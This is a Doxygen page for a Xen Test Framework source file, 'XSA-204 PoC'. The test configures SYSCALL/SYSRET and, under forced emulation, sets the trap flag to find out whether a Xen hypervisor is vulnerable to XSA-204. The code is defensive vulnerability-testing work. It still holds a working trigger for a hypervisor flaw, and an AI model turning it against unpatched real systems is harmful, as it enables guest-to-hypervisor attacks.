Xen Test Framework
main.c
Go to the documentation of this file.
1 
22 #include <xtf.h>
23 
24 const char test_title[] = "XSA-204 PoC";
25 bool test_needs_fep = true;
26 
27 void entry_SYSCALL_64(void);
28 asm(".align 8;"
29  "entry_SYSCALL_64:"
30  "1: and $~" STR(X86_EFLAGS_TF) ", %r11;"
31  "sysretq;"
32  _ASM_EXTABLE_HANDLER(1b, 1b, ex_record_fault_eax)
33  );
34 
35 static unsigned long __user_text user_force_syscall(void)
36 {
37  unsigned long fault = 0;
38 
39  asm volatile ("pushf;"
40  "orl $%c[TF], (%%rsp);"
41  "popf;"
42  _ASM_XEN_FEP "syscall;"
43  : "+a" (fault)
44  : [TF] "i" (X86_EFLAGS_TF)
45  : "rcx", "r11");
46 
47  return fault;
48 }
49 
50 void test_main(void)
51 {
52  if ( !cpu_has_syscall )
53  return xtf_skip("Skip: SYSCALL not suported\n");
54 
55  /* Enable SYSCALL/SYSRET. */
56  wrmsr(MSR_EFER, rdmsr(MSR_EFER) | EFER_SCE);
57 
58  /* Lay out the GDT suitably for SYSCALL/SYSRET. */
59  gdt[GDTE_AVAIL0] = gdt[__KERN_CS >> 3]; /* SYSCALL %cs/%ss selectors */
60  gdt[GDTE_AVAIL1] = gdt[GDTE_DS32_DPL0];
61 
62  gdt[GDTE_AVAIL2] = gdt[GDTE_CS32_DPL3]; /* SYSRET %cs/%ss selectors */
63  gdt[GDTE_AVAIL3] = gdt[GDTE_DS32_DPL3];
64  gdt[GDTE_AVAIL4] = gdt[GDTE_CS64_DPL3];
65 
66  /* Set up the MSRs. */
67  wrmsr(MSR_STAR, ((((uint64_t)GDTE_AVAIL0 * 8 + 0) << 32) |
68  (((uint64_t)GDTE_AVAIL2 * 8 + 3) << 48)));
69  wrmsr(MSR_LSTAR, _u(entry_SYSCALL_64));
70  wrmsr(MSR_FMASK, X86_EFLAGS_TF);
71 
72  exinfo_t ex = exec_user(user_force_syscall);
73  switch ( ex )
74  {
75  case 0:
76  return xtf_success("Success: Not vulnerable to XSA-204\n");
77 
78  case EXINFO_SYM(DB, 0):
79  return xtf_failure("Fail: Got #DB - vulnerable to XSA-204\n");
80 
81  default:
82  return xtf_error("Error: Expected nothing, got %pe\n", _p(ex));
83  }
84 }
85 
86 /*
87  * Local variables:
88  * mode: C
89  * c-file-style: "BSD"
90  * c-basic-offset: 4
91  * tab-width: 4
92  * indent-tabs-mode: nil
93  * End:
94  */
exinfo_t
unsigned int exinfo_t
Packed exception and error code information.
Definition: exinfo.h:19
wrmsr
static void wrmsr(uint32_t idx, uint64_t val)
Thin wrapper around an wrmsr instruction.
Definition: msr.h:55
_ASM_XEN_FEP
#define _ASM_XEN_FEP
Xen Forced Emulation Prefix.
Definition: xen.h:150
rdmsr
static uint64_t rdmsr(uint32_t idx)
Thin wrapper around an rdmsr instruction.
Definition: msr.h:19
ex_record_fault_eax
bool ex_record_fault_eax(struct cpu_regs *regs, const struct extable_entry *ex)
Record the current fault in %eax.
Definition: extable.c:8
GDTE_AVAIL4
#define GDTE_AVAIL4
Definition: segment.h:41
X86_EFLAGS_TF
#define X86_EFLAGS_TF
Definition: processor.h:13
GDTE_CS32_DPL3
#define GDTE_CS32_DPL3
Definition: segment.h:31
_u
#define _u(v)
Express an arbitrary value v as unsigned long.
Definition: numbers.h:53
GDTE_DS32_DPL0
#define GDTE_DS32_DPL0
Definition: segment.h:29
STR
#define STR(x)
Stringise an expression, expanding preprocessor tokens.
Definition: macro_magic.h:17
EFER_SCE
#define EFER_SCE
Definition: msr-index.h:50
__user_text
#define __user_text
Definition: compiler.h:33
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
GDTE_AVAIL3
#define GDTE_AVAIL3
Definition: segment.h:40
gdt
user_desc gdt[NR_GDT_ENTRIES]
xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137
uint64_t
__UINT64_TYPE__ uint64_t
Definition: stdint.h:17
GDTE_AVAIL1
#define GDTE_AVAIL1
Definition: segment.h:38
MSR_STAR
#define MSR_STAR
Definition: msr-index.h:59
GDTE_DS32_DPL3
#define GDTE_DS32_DPL3
Definition: segment.h:32
xtf_skip
void xtf_skip(const char *fmt,...)
Report a test skip.
Definition: report.c:66
test_needs_fep
bool test_needs_fep
Boolean indicating whether the test is entirely predicated on the available of the Force Emulation Pr...
Definition: main.c:34
test_title
const char test_title[]
The title of the test.
Definition: main.c:14
MSR_EFER
#define MSR_EFER
Definition: msr-index.h:49
GDTE_CS64_DPL3
#define GDTE_CS64_DPL3
Definition: segment.h:30
MSR_FMASK
#define MSR_FMASK
Definition: msr-index.h:62
GDTE_AVAIL0
#define GDTE_AVAIL0
Definition: segment.h:37
user_force_syscall
static unsigned long user_force_syscall(void)
Definition: main.c:35
exec_user
static unsigned long exec_user(unsigned long(*fn)(void))
Definition: lib.h:62
_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48
EXINFO_SYM
#define EXINFO_SYM(exc, ec)
Definition: exinfo.h:29
xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80
entry_SYSCALL_64
void entry_SYSCALL_64(void)
cpu_has_syscall
#define cpu_has_syscall
Definition: cpuid.h:84
MSR_LSTAR
#define MSR_LSTAR
Definition: msr-index.h:60
_ASM_EXTABLE_HANDLER
#define _ASM_EXTABLE_HANDLER(fault, fixup, handler)
Create an exception table entry with custom handler.
Definition: extable.h:38
GDTE_AVAIL2
#define GDTE_AVAIL2
Definition: segment.h:39
Generated by   doxygen 1.8.13